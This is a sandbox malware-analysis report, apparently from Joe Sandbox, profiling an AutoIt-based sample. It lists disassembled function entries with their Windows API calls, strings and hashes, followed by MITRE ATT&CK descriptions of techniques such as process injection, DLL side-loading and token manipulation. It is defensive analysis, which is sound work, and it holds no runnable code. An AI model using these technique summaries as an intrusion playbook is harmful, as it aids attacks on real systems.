Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 66a5bd139204a22eae2abd7f69f4c7adc54faee2afd03109d5957d65935db42d
Instruction ID: b6afdc7c3754e9335396d686871fe5bd7a297c526fa98d857aee77a3d827c37f
Opcode Fuzzy Hash: 66a5bd139204a22eae2abd7f69f4c7adc54faee2afd03109d5957d65935db42d
Instruction Fuzzy Hash: 49311871800119AFDF05EFA1CC85EEEBFB9FF08300F105029E959B6166DA325A56DBA0

Function 00EF6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00EF6D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EF6DC2

Strings

static, xrefs: 00EF6D22

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 2f3884e23dc74f3605087a11910b9bbb1d329492c20fb76af078113eea816bd5
Instruction ID: 0c7cc15cb97c4f0a2b7f70309640ed7501b5792257649eed7e82b68544576dba
Opcode Fuzzy Hash: 2f3884e23dc74f3605087a11910b9bbb1d329492c20fb76af078113eea816bd5
Instruction Fuzzy Hash: 65315071210608AFDB109F74CC40AFB77B9FF88764F10A519FA99A7190DB71AC51DB60

Function 00ED2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ED2E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00ED2E3B

Strings

0, xrefs: 00ED2DF9

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5aaf7edda2fec8e044aae4ae897afd825c6bae75dd3ea3baff671416d672f7ae
Instruction ID: f81f62eae11ed4fcdeedce57fdd7146d0ee9601563f74afc63e17708b9f0835a
Opcode Fuzzy Hash: 5aaf7edda2fec8e044aae4ae897afd825c6bae75dd3ea3baff671416d672f7ae
Instruction Fuzzy Hash: DA312731600305ABEB268F58C8447AEBBF5EF15354F14142FEE81F72A1D7709942CB50

Function 00EF6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EF69D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF69DB

Strings

Combobox, xrefs: 00EF699D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 678b2feca76aa4e95a5142433e39e4f148819211b8df88a3aa5dd7343d657a6d
Instruction ID: c3fe5a44111553e85fb7ccd59609183264be7864207b50a9979b09dec2025b1a
Opcode Fuzzy Hash: 678b2feca76aa4e95a5142433e39e4f148819211b8df88a3aa5dd7343d657a6d
Instruction Fuzzy Hash: 4E11B67160020C7FEF119F14CC80EBB37AAEBC93A8F115124FA58AB290D6B1DC5187A0

Function 00EF6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91

GetWindowRect.USER32(00000000,?), ref: 00EF6EE0
GetSysColor.USER32(00000012), ref: 00EF6EFA

Strings

static, xrefs: 00EF6EBD

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: fd12aa6c7783ff9095c7a827131918af55c263b9ee783f9dc433dafe6413003d
Instruction ID: fd2de6a6369f235071cf17418216fec1c374b2507239ac50c3e669a2b3521250
Opcode Fuzzy Hash: fd12aa6c7783ff9095c7a827131918af55c263b9ee783f9dc433dafe6413003d
Instruction Fuzzy Hash: 78212972610209AFDB04DFA8DD45AFA7BB8FB48314F005629FE55E3250E734E861DB50

Function 00EF6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00EF6C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EF6C20

Strings

edit, xrefs: 00EF6BF5

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 8f93d55676d8dddae9170baddc2beeea7b99bb23345b3525c3fd95a3a04f0919
Instruction ID: 95fbce8e84aa454fbdb88543650fc3658f5ab21361a62fe7ff98fcefb6a120aa
Opcode Fuzzy Hash: 8f93d55676d8dddae9170baddc2beeea7b99bb23345b3525c3fd95a3a04f0919
Instruction Fuzzy Hash: 24116A7150020CABEB108F64DC45AFA3BAAEF54378F605724FAA5E71E0C775DC91AB60

Function 00ED2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ED2F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00ED2F30

Strings

0, xrefs: 00ED2F07

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 3a3b7cab45234a7401965f4a4c35208b374b4082c37554e9436fd9885280a8e5
Instruction ID: eaf9d8e0cf83a94cbb92b4a4c3600371f282064636a68796521fc144b338a521
Opcode Fuzzy Hash: 3a3b7cab45234a7401965f4a4c35208b374b4082c37554e9436fd9885280a8e5
Instruction Fuzzy Hash: 7F11BE31E01118AFCB21DB98DC44BA973BAEB25318F0450AAEE44F73A0D7B0AD069791

Function 00EE24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EE2520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EE2549

Strings

<local>, xrefs: 00EE2511

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: f6fef275da535160833f346fc8be4a2eca0b26046cf273305082f704777517db
Instruction ID: 566e9e8ecb35d84c02a7563ac01709dab19266d304667bd88a25130ea220a206
Opcode Fuzzy Hash: f6fef275da535160833f346fc8be4a2eca0b26046cf273305082f704777517db
Instruction Fuzzy Hash: 5311E370501669BEDB248F538C94EFBFF6CFF05355F10912EF60566040D2705948DAE1

Function 00EE80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EE80C8,?,00000000,?,?), ref: 00EE8322

inet_addr.WSOCK32(00000000), ref: 00EE80CB
htons.WSOCK32(00000000), ref: 00EE8108

Strings

255.255.255.255, xrefs: 00EE80E3

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 440eec9577253bc7a9d13255b2d429ea0d398f0150d4d84f7ff85875939093cf
Instruction ID: 0f25d439ca8f236bdcb1a6a67f35ce6691bd4815d92d9a0fde81af243d91fdb2
Opcode Fuzzy Hash: 440eec9577253bc7a9d13255b2d429ea0d398f0150d4d84f7ff85875939093cf
Instruction Fuzzy Hash: BD112130200249ABDB20AF65CD92FFEB364FF00320F10952BE919B72C2CA72A805C691

Function 00EC92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EC9355

Strings

ListBox, xrefs: 00EC931F
ComboBox, xrefs: 00EC92F4

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: efc7a50bf31d676eeecb1b331107f2fe95a7c9456537b17f23f4ea0b3aaef77d
Instruction ID: eda28815d3c456c2c631137ca55938997f5b324440f5fe31abfd5df1856bb11b
Opcode Fuzzy Hash: efc7a50bf31d676eeecb1b331107f2fe95a7c9456537b17f23f4ea0b3aaef77d
Instruction Fuzzy Hash: 6E014131A04214ABCB08EBA4CC82DFE73A8FF02320B142A1DF836772C2DB32580CC251

Function 00EC91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 00EC924D

Strings

ListBox, xrefs: 00EC9217
ComboBox, xrefs: 00EC91EC

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9aad6fb609b4529043c5206580fc6072b81418aec040dc691c63ad92315084ef
Instruction ID: d2a78b9b060069c48d6eb57594ed2b0beebb4542c3ab4a9925ad02cbaa3f6e53
Opcode Fuzzy Hash: 9aad6fb609b4529043c5206580fc6072b81418aec040dc691c63ad92315084ef
Instruction Fuzzy Hash: 0201D871B41104BBCB18E7A0DA97EFF73E8DF05300F141019B95673192EA515F0D9262

Function 00EC9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 00EC92D0

Strings

ListBox, xrefs: 00EC929C
ComboBox, xrefs: 00EC9271

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9f5236ff90ce3d07491db8c9c530133a70d0bb2fd59a9c42d65b4527d271dc69
Instruction ID: 774fcfefd115aabe7ccf93adfced9bd64e539d14a0a1dae58d8fd01e4474e9e7
Opcode Fuzzy Hash: 9f5236ff90ce3d07491db8c9c530133a70d0bb2fd59a9c42d65b4527d271dc69
Instruction Fuzzy Hash: 5101A772A4510477CB18E6A0DA87EFF77EC9F11300F246119B85673192DA525F0D9272

Function 00ED51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00ED51E8
_wcscmp.LIBCMT ref: 00ED51FA

Strings

#32770, xrefs: 00ED51F4

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 39b0c138df0cc53d32bda067fd43bc559f264a03e4efdc43f16d75e7a23318c6
Instruction ID: 7e215e0072ce593a6c3d4f73fd19735cc5712508706492544e3214a389bdb52a
Opcode Fuzzy Hash: 39b0c138df0cc53d32bda067fd43bc559f264a03e4efdc43f16d75e7a23318c6
Instruction Fuzzy Hash: 86E09B7250432D5BD720AA99AC45AA7F7ACEB45771F000157F914E3150D560994587D1

Function 00EC81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EC81CA

Part of subcall function 00E93598: _doexit.LIBCMT ref: 00E935A2

Strings

Error allocating memory., xrefs: 00EC81C3
AutoIt, xrefs: 00EC81BE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 2c72935628ed0652a6acf8d5e358d4ab773ab4dbd50b2804428ca4d7d41f772a
Instruction ID: e9eabe7a518316a1fa04a605c791a4bfbf84cc151ee41289832b74995047b759
Opcode Fuzzy Hash: 2c72935628ed0652a6acf8d5e358d4ab773ab4dbd50b2804428ca4d7d41f772a
Instruction Fuzzy Hash: 1ED012323C531836D61432A56D06FC576C84B05B55F549015BB08B55D38ED6D98292DE

Function 00EAB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00EAB564: _memset.LIBCMT ref: 00EAB571

Part of subcall function 00E90B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00EAB540,?,?,?,00E7100A), ref: 00E90B89

IsDebuggerPresent.KERNEL32(?,?,?,00E7100A), ref: 00EAB544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E7100A), ref: 00EAB553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EAB54E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: a8ca204651c4726d77a7ec6e0baadfd8959b9f4a646115f3a47e3c72435874c9
Instruction ID: 26bb2b720dde5b6a93a2eb7a3209c4fa92a34538d06b15c6b22f0ed81587be77
Opcode Fuzzy Hash: a8ca204651c4726d77a7ec6e0baadfd8959b9f4a646115f3a47e3c72435874c9
Instruction Fuzzy Hash: 4EE09270600310CFD760DF69E4043827BE4AF04714F04C96CE486E7362EBB4E448CB61

Function 00EF5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EF5BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EF5C08

Part of subcall function 00ED54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E

Strings

Shell_TrayWnd, xrefs: 00EF5BEE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6f3dcbf021b500f03856540ff37e4c497780c12d16ce990deb1909e32c479dd7
Instruction ID: 572c284a5cb40fa9d1c3e67d526b74d91ccbc41531b050f7abd80919048ab655
Opcode Fuzzy Hash: 6f3dcbf021b500f03856540ff37e4c497780c12d16ce990deb1909e32c479dd7
Instruction Fuzzy Hash: ADD0C932388311BBE774AB71AC1BFA76A54AF40B61F110825B656BA2D0D9E49805C651

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

